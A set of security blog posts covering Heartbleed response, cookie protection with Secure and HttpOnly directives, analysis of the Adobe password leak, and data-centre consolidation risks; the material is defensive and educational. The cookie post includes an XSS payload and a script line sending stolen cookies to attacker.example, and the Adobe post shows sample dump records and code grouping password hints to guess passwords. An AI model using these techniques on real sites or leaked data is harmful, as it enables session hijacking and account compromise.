To give you some context, I’m writing this blog in the days immediately following the Heartbleed event. I’m not going to comment on the event itself, as it has been done to death elsewhere, but I am going to focus on the reaction of the affected organisations.

Events like this, whilst rare, cannot be avoided entirely by any organisation that uses computers attached to the Internet. Software has flaws. Some flaws will be catastrophic. It’s a given. However, knowing this, you can prepare for the worst.

Firstly, many organisations had no idea what their attack surface was. Sure, it’s fairly trivial to point at the corporate web site, but many simply weren’t aware that there was a vulnerable SSL component in their other internet-facing applications, like their email servers. Understanding your attack surface has to be the first step in protecting it; otherwise, how can you protect that which you are not aware of?

Secondly, whatever incident response process they had just seemed to crumble. The flaw itself, whilst devastating, was thankfully easy to patch or otherwise mitigate. After that, certificates simply needed to be regenerated, and finally any authentication credentials expired and changed. Yet it was clear that many high-profile organisations had taken no action long after the vulnerability was being actively exploited in the wild. Being objective, at that point any services deemed to hold confidential data should simply have been taken offline to protect the brand. Decisions like this need to be pre-made by executives, and solid processes need to be established in advance, so that they can be carried out swiftly by the staff that administer the systems.

The reality is that this isn’t going to be a unique event. There will inevitably be others to come.

If your organisation does not understand your attack-surface and does not have a comprehensive incident response process already in place, then now is the time to act. You may be shutting the door behind this particular horse, but rest assured that there are plenty of other horses that you can still protect.

Comfort Eating for Web Applications

Cookies were devised to enable websites and applications to store small amounts of information in the browser. This allows the otherwise ‘stateless’ HTTP protocol used by browsers to be augmented so that a site can enhance the user experience; for example, remembering who the user is and what they were doing, to tailor the content they receive.

While there are potentially a vast number of uses for cookies, both benign and nefarious, an exceptionally common one is the storage and transmission of session data, enabling web applications to provide a full experience for users. Session data provided via cookies allows applications to support continuous authentication: users can access content and functionality without having to re-authenticate every time they request a different page or feature, which would otherwise be necessary because the server has no other reliable way of keeping track of requests received from the user’s browser.

The value allocated to the user within the cookie can also encode their privileges: for example, the difference between the access rights accorded to an authenticated administrative user as opposed to a standard user within a banking application. The value indicates the access rights, based on the stateful session. Staying within the realm of banking applications, it is important that the privileges accorded to a user do not become corrupted. It is equally important that the sessions of two standard users do not cross. In either situation, corruption of the relevant privileges could result in financial loss to both the bank and the end users.

It is equally important to remember that any service with an authentication system is by definition trying to keep some sort of information secure. Any application with user data or information will generally use cookies to identify users after they have authenticated. Once the application has identified and verified the user, the session token issued in the cookie is often the ONLY information that separates one authenticated user from another, or from a malicious hacker.

Once the user’s ID and authentication credentials have been entered, whether via email and password or a full multi-factor strong authentication system, the cookie generated must be protected if the user is to be protected.

Cookie Monsters, Nom Nom

Now is when we should switch our thinking to that of someone out to cause trouble! That cookie is all that stands between you and access to your target’s services and data.

There are a handful of ways the token can be compromised by an attacker; essentially, they can either steal the cookie after the user has authenticated, or force the user to use a token the attacker already knows. The latter involves implementation issues that are outside the scope of this article, but watch this space.

The former, stealing the user’s cookie, involves either snooping on their session to grab it ‘on the wire’, or tricking the user, their browser or the application into handing the cookie over.

By far the most common way to gain access to a session cookie is via a cross-site scripting (XSS) vulnerability.

In the example below the cookie is simply displayed on screen; in reality it could be pushed to a remote site by an embedded script and then utilised by a malicious user, as seen in the Apache.org XSS compromise in 2010 [1]. A classic proof-of-concept payload looks something like this:

          <script>alert(document.cookie);</script>
A session token obtained in this manner can be used to impersonate the user from whom it was stolen. If there are no further security measures in place, the token can be used to access the active session, gaining full access to the user’s functionality.

Another way cookies may be exposed is by an attacker sitting in a strategic location on the network and snooping on traffic to grab the all-important tokens. This has commonly occurred in shared network environments providing free WiFi access, like the ubiquitous coffee shops and fast food joints we often work in during lunch. The attacker sits on those networks (or sets up their own fake equivalent), monitoring the network activity and poaching the valuable sessions. This has played no small part in the massive migration of online services from unencrypted HTTP to SSL-wrapped HTTPS, to try and stem the flow of drive-by account hijacks.

Defending the Cookie Jar – Set-Cookie Directives

Issues with cookie management usually arise with the directives. The problems aren’t new, and the smart folk who devise the standards underpinning online communications have provided extra mechanisms to defend ourselves. Two directives can be employed to prevent the aforementioned cross-site scripting and similar attacks: the ‘Secure’ directive and the ‘HttpOnly’ directive.

The former, the ‘Secure’ directive, directs the browser to send the cookie ‘securely’. Sadly this is a rather informal definition, but in practice it prevents the cookie being sent over unencrypted channels. Development of the application should hopefully have followed some basic security standards: at a minimum, the login process and any protected (authenticated) pages, and ideally the entire application, should be served over HTTPS. There is no reason to send a cookie that could contain sensitive information over unencrypted HTTP, where it would be susceptible to network sniffing attacks.

          Example of a Java session ID cookie with the ‘Secure’ directive:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; Secure;

Similarly, the latter, the ‘HttpOnly’ directive, instructs the browser to only pass the cookie back to the server through its default mechanism: the ‘Cookie:’ HTTP header. The key objective of this directive is to prevent access to the cookie by script executing in the browser. The token set by the server is still passed back with every request, enabling the server to use it to track the session, but no script running in the browser should be able to read or modify it.

If the ‘HttpOnly’ directive is not present in the Set-Cookie header sent by the server, the cookie can be read by client-side JavaScript, as shown in the example above. Should an XSS vulnerability be present on the site in question, the cookie, and subsequently the session of the user, could be captured and utilised by a malicious user.
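As a sketch of what such an injected script can do when ‘HttpOnly’ is absent (the browser’s document object is simulated here so the snippet runs standalone under Node; the session ID is the example value used throughout this article):

```javascript
// Simulated browser state: in a real page, document.cookie exposes
// every cookie NOT flagged HttpOnly as one "name=value; ..." string.
const document = { cookie: "jsessionid=AS348AF929FK219CKA9FK3B79870H; theme=dark" };

// An attacker's injected script simply reads the cookie string...
const stolen = document.cookie;

// ...and would typically exfiltrate it, for instance by loading a
// remote image from a server the attacker controls:
// new Image().src = "https://attacker.example/steal?c=" + encodeURIComponent(stolen);
console.log(stolen);
```

With ‘HttpOnly’ set, the session cookie is simply missing from that string, and the same injected script comes away empty-handed.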

Unless the web application in use requires client-side scripts to read or edit the cookie value, there is almost no reason not to have the ‘HttpOnly’ directive present.

          Example of a Java session ID cookie with the ‘HttpOnly’ directive:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; HttpOnly;

These cookie directives can of course be used in unison:

          Example of a Java session ID cookie with the ‘HttpOnly’ and ‘Secure’ directives:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; HttpOnly; Secure;

Failing to implement these simple directives in your applications greatly increases the possibility of session-based attacks.

Going on a Cookie Diet: Implementing Directives

The following guide shows how to implement these directives in some of the more common web authoring languages.

‘Secure’ Directive:

Java (Servlet 3.0 (Java EE 6)):

A standard method was introduced to manage session cookies in Java’s web.xml:

          <session-config>
              <cookie-config>
                  <secure>true</secure>
              </cookie-config>
          </session-config>

PHP:

The ‘Secure’ directive for PHP session cookies is set within the session_set_cookie_params function:

void session_set_cookie_params ( int $lifetime [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]] )


.NET:

Under .NET you can set the cookie directives within the web.config file, in the system.web/httpCookies element:

<httpCookies requireSSL="true" ... >

‘HTTP Only’ Directive:

Java (Servlet 3.0 (Java EE 6)):

A standard method was introduced to manage session cookies in Java’s web.xml:

          <session-config>
              <cookie-config>
                  <http-only>true</http-only>
              </cookie-config>
          </session-config>

PHP:

As with the ‘Secure’ directive, ‘HttpOnly’ is set within the session_set_cookie_params function:

void session_set_cookie_params ( int $lifetime [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]] )


.NET:

Under .NET you can set the cookie directives within the web.config file, in the system.web/httpCookies element:

<httpCookies httpOnlyCookies="true" ... >

By Chris McCall
Image by Michelle O’Connell

At the beginning of October, Adobe reported a data breach that affected around 3 million customers [1]. In the following weeks the number rose significantly, but this was just the tip of the iceberg. At the beginning of November a huge dump of the data was published online, containing an eye-watering 150 million entries.

Various organisations, individuals and companies have analysed this data and reached the same conclusions: firstly, Adobe’s choice of encryption was extremely poor, and secondly, the passwords chosen by users were shocking. See the original research by Jeremi Gosney [2], and an excellent article by Paul Ducklin, for more information [3].

While most researchers were focusing on cracking the encryption key or criticising Adobe for its poor choice of encryption, Corsaire initially did further analysis, focusing on extracting information to help our clients understand the implications of the leak and the lessons that can be learnt from it. We have now decided to publish this advice more widely in the infosec community.

1.1     Weak Password Choice

Looking at Jeremi Gosney’s top 100 list, it is obvious that users are choosing very weak and simple passwords. While this is no real surprise, the worrying aspect is that many of these weak passwords are associated with corporate email addresses. For example, one global security company is using the generic password ‘123456’ for the account with the email address format of company@company.com.


1.2     Password Reuse

Examination of the data reveals users are reusing the same password across multiple accounts, both corporate and personal. For example:

67436532-|–|-jbloggs@company.co.uk-|-VdcYhakfnPioxG6CatHBw==-|-your wife|–

a2342312-|–|-purchasing@company.co.uk-|-VdcYhakfnPioxG6CatHBw==-|-wife|–

72349517-|–|-jbloggs@hotmail.co.uk-|-VdcYhakfnPioxG6CatHBw==-|-wife|–

1.3     Related Accounts

Another piece of information that can be obtained from the reuse of passwords is the ability to link related accounts. In the example below you can track the employment history of J. Bloggs based on his password reuse.



23552666-|–|-j.bloggs@getfit.com-|-nSFKSJFaKERjfsxG6CatHBw==-|-|–


Of course, this will be difficult to achieve if the user has chosen a common password.

1.4     Password Hints

As the encryption key is still not publicly known, the encrypted passwords cannot be reversed to yield the plaintext password. Unfortunately, the presence of unencrypted password hints supplied by the users allows us to make a very confident guess at the password. A single hint is often not enough information to allow a confident guess, but 10 or more hints for the same password make the process considerably easier.

In the example below, the encrypted password is:


This is used in 25 different accounts. The associated password hints include:

Favourite element

Tl u/c

The usual metal

The rock

Seeing all these hints together allows us to make an educated guess that the password is probably ‘Thallium’.
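The grouping step itself is trivial. The sketch below (hypothetical records with placeholder ciphertexts, field layout inferred from the extracts above: id, blank, email, encrypted password, hint) collects the plaintext hints by the encrypted password they accompany; shared passwords accumulate many hints, which is what makes the educated guess possible.

```javascript
// Hypothetical dump records: id-|--|-email-|-encrypted_pw-|-hint|--
const records = [
  "23552666-|--|-a@example.com-|-ENCPW1==-|-favourite element|--",
  "23552667-|--|-b@example.com-|-ENCPW1==-|-the usual metal|--",
  "23552668-|--|-c@example.com-|-ENCPW2==-|-wife|--",
];

// Group hints by encrypted password: identical ciphertexts mean
// identical passwords under ECB-mode encryption with a single key.
const hintsByPassword = {};
for (const line of records) {
  const fields = line.split("-|-");
  const encrypted = fields[3];
  const hint = fields[4].replace(/\|--$/, "");
  (hintsByPassword[encrypted] = hintsByPassword[encrypted] || []).push(hint);
}
console.log(hintsByPassword);
```

Each ciphertext now carries every hint its users supplied, side by side, ready for the kind of inference shown above.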

1.5     Recommendations

The main point to take on board from this data leak (after you have reset all your Adobe account passwords) is that users are the weakest security link in your company. While it is easy to implement and enforce a password policy within the internal corporate environment (via group policies, for example), it’s a very different situation online. You have no control over any particular individual’s password strength if the online service or site does not enforce it.

This is where user education is vital. Educating your employees in password management best practice is a must, and it should be done on a regular basis. Companies must ensure all users not only know and understand the current password policy, but also the implications of using weak passwords or reusing passwords between corporate and personal accounts, especially online. In addition to education, providing your users with the means to generate suitable passwords and store them securely will help (for example, password generators and password safe software).

If this has made you nervous and you would like us to examine the leaked data for any accounts related to your company, just get in touch!

Samantha Fielden, Head of Client Management
Artwork by Michael Gillette


Russian Dolls

As security professionals, one thing that we see repeatedly is the conflict between securing an organisation’s data assets and the cost of doing so. It’s a legitimate business conflict too. Whilst the recession is still fresh in everyone’s memory, saving money is always going to be a hot topic.

There can be significant economies of scale by consolidating data centre equipment. Folding all the hardware platforms into a single virtual server farm should slim the rack real-estate, whilst simultaneously reducing the need for power and air-conditioning. Likewise, merging the storage into a single, high-availability Storage Area Network (SAN) can increase reliability and reduce the overall cost of ownership. Then there is all that pesky networking equipment, like routers and switches; surely it would be cheaper to replace it all with a large multi-blade chassis?

However, the problem with too much consolidation is that sooner or later someone will be tempted to merge several clumps of applications and data (security domains) that have conflicting security requirements to save a few pennies. For example, sensitive financial systems that are only accessed by authorised users, and publicly accessible, brochure websites that anyone can use.

Two concepts you will hear security people talk about constantly are a “layered approach” and “compartmentalisation”. A layered approach refers to having multiple sets of security controls, so that if one fails, an attacker does not get complete access to the data. Compartmentalisation in turn refers to deliberately separating systems into discrete chunks, so that a breach in one area remains isolated. Consolidation often negates both.

One might ask, why would this be a problem?

In a heavily consolidated environment it becomes much more straightforward for an attacker to use the common platform as a route to move between systems. Something as simple as a configuration mistake on a consolidated MPLS router, that routes both internal and external circuits, could allow access to your sensitive data. Or an attacker could use a consolidated SAN fabric with both internal and DMZ servers attached to bypass network firewalls. VM clusters that host both Internet-accessible and internal servers are also made vulnerable by consolidation. In the event of one server being compromised, then the VM platform itself may be attacked directly, allowing all servers hosted on it to be accessed.

Don’t get me wrong; consolidation can be a good thing when it is done well, and the savings are very real. However, before you commit to a consolidation plan proposed by your integration vendor, run it past your security team to make sure the savings won’t be wiped out by the cost of a PR debacle.

Martin O’Neal

Photo: Lachlan Fearnley